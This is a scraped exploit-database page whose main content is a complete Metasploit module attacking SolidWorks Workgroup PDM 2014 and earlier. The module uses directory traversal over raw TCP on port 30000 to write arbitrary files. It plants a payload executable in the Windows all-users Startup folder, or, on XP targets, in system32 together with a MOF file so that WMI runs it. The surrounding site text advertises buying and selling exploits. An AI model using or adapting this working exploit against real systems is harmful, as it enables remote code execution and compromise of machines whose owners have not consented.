0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SolidWorks Workgroup PDM 2014 Arbitrary File Write Exploit
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::WbemExec include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write', 'Description' => %q{ This module exploits a remote arbitrary file write vulnerability in SolidWorks Workgroup PDM 2014 SP2 and prior. For targets running Windows Vista or newer the payload is written to the startup folder for all users and executed upon next user logon. For targets before Windows Vista code execution can be achieved by first uploading the payload as an exe file, and then upload another mof file, which schedules WMI to execute the uploaded payload. This module has been tested successfully on SolidWorks Workgroup PDM 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN). }, 'License' => MSF_LICENSE, 'Author' => [ 'Mohamed Shetta <mshetta[at]live.com>', # Initial discovery and PoC 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit ], 'References' => [ ['EDB', '31831'], ['OSVDB', '103671'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Platform' => 'win', 'Targets' => [ # Tested on: # - SolidWorks Workgroup PDM 2011 SP0 (Windows XP SP3 - EN) # - SolidWorks Workgroup PDM 2011 SP0 (Windows 7 SP1 - EN) ['Automatic', { 'auto' => true } ], # both ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)', {}], ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)', {}], ], 'Privileged' => true, 'DisclosureDate' => 'Feb 22 2014', 'DefaultTarget' => 0)) register_options([ OptInt.new('DEPTH', [true, 'Traversal depth', 10]), Opt::RPORT(30000) ], self.class) end def peer "#{rhost}:#{rport}" end # # Check # def check # op code req = "\xD0\x07\x00\x00" # filename length req << "\x00\x00\x00\x00" # data length req << "\x00\x00\x00\x00" connect sock.put req res = sock.get_once disconnect if !res vprint_error "#{peer} - Connection failed." Exploit::CheckCode::Unknown elsif res == "\x00\x00\x00\x00" vprint_status "#{peer} - Received reply (#{res.length} bytes)" Exploit::CheckCode::Detected else vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)" Exploit::CheckCode::Safe end end # # Send a file # def upload(fname, data) # every character in the filename must be followed by 0x00 fname = fname.scan(/./).join("\x00") + "\x00" # op code req = "\xD0\x07\x00\x00" # filename length req << "#{[fname.length].pack('l')}" # file name req << "#{fname}" # data length req << "#{[data.length].pack('l')}" # data req << "#{data}" connect sock.put req res = sock.get_once disconnect if !res fail_with(Failure::Unknown, "#{peer} - Connection failed.") elsif res == "\x00\x00\x00\x00" print_status "#{peer} - Received reply (#{res.length} bytes)" else print_warning "#{peer} - Unexpected reply (#{res.length} bytes)" end end # # Exploit # def exploit depth = '..\\' * datastore['DEPTH'] exe = generate_payload_exe exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe" if target.name =~ /Automatic/ or target.name =~ /Vista/ print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)") upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe) end if target.name =~ /Automatic/ or target.name =~ /XP/ print_status("#{peer} - Sending EXE (#{exe.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe) mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) print_status("#{peer} - Sending MOF (#{mof.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") end register_file_for_cleanup("#{::File.basename(exe_name)}") end end # 0day.today [2024-11-15] #